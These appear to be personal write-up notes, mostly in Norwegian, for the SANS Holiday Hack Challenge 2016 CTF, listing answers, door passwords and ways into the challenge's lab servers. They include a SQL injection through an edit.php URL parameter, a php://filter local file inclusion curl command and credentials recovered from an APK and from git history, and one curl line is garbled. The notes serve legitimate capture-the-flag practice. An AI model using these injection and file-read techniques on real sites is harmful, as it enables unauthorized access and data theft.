1) bugbounty

2) the apk file

3) guest busyreindeer78

4) discombobulatedaudio1.mp3

5) yummycookies

6) first door) part1) santasli part2) ttlehelper - brukte sudo -u itchy strings /out.pcap, passordet ligger øverst i filen

second door) open_sesame - print alle directories rekursivt så man ser hvor man skal. bruk så cd med \ for å finne fram

third door) WUMPUS IS MISUNDERSTOOD - skyt pil inn i rommet når man lukter wumpusen

fourth) 24fb3e89ce2aa0ea422c3d511d40dd84 - bruk less i help-siden til å kjøre ls og finne passordet i kodefilene

fourth door (Sants office)) spill ihht dialogen fra filmen war games

siste dør i gangen) passordet fra lydfilene

7)

analytics.northpolewonderland.com

104.198.252.157

brukernavn og pass er guest / busyreindeer87 fra apk

hentet ut audio2 fra nettside ved bruk av query

del2

admin skal visst gi tilgang til noe mer? last ned .git repo og se på changelog i refs/heads/master.

bruk git log til å se på commit messages, fant administrator med passord der. bruk edit funksjonen til å manipulere databasen for å hente ut audio. lag et query, edit det, se på kommandoen som lekker ut, se i edit.php og query.php at man kan skrive inn query i adressefeltet for å manipulere databasen. (sql injection ish)

https://analytics.northpolewonderland.com/edit.php?id=61f9ec9b-6192-463b-aee5-5a0983362dff&name=Name\_Field&description=Description\_Field&query=show tables;, for å vise tabellen

select * from audio;

select filename, to_base64(mp3) from audio;

kjørte base64 gjennom en online converter for å få ut mp3

ads.northpolewonderland.com

104.198.221.240

https://pen-testing.sans.org/blog/2016/12/06/mining-meteor

mine javascript med meteor-scriptet til man finner noe audio-relatert

trykk routes admin/quotes

homequotes hadde en hidden array object med "audio"

dev.northpolewonderland.com

35.184.63.245

https://ncsa.github.io/sans-holiday-hack-2016/\#org6a9d097

kjøre en curl for å få json-reponsen

curl -s -H "Content-Type: application/json" \

-d '{"date": "20170101010101-0800", "udid": "11111111", "debug": "com.northpolewonderland.santagram.EditProfile, \

 EditProfile", "freemem": "10200", "verbose": true}' \

http://dev.northpolewonderland.com/index.php | python -mjson.tool | grep mp3

dungeon.northpolewonderland.com

35.184.47.139

online game - netcat ip port for å spille

skal være et hemmelig rom med en elf

kan bruke ltrace til å inspisere hva som skjer

last ned cdungeon.decode.c og en versjon av dtextc.dat. dekompiler disse filene og kjør diff for å se på forskjellen. fant linje 1024 som jeg kjørte i GDT> DT, entry: 1024 og fik kda ut en epost som ga meg lydfilen.

ex.northpolewonderland.com

104.154.196.33

må skrive og lese crashdumps via php og base64 encode filter.

tror man skal skrive noen form for exploit som returnerer noe nyttig.

masse hint i apken

curl -X POST -H "Content-Type:application/json" -d '{"operation":"ReadCrashDump","data":{"crashdump":"crashdump-joO6X2"}}' http://ex.northpolewonderland.com/exception.php?page=php://filter/base64-encode/resource=exception

kanskje man kan skrive print exception og få ut fil

curl -X POST -H "Content-Type:applicadCrashDump","data":{"crashdump":"php://filter/convert.base64-encode/resource=exception"}}' http://ex.northpolewonderland.com/exception.php | base64 -d

works

9) dr who

10) he wanted to prevent star wars

results matching ""

    No results matching ""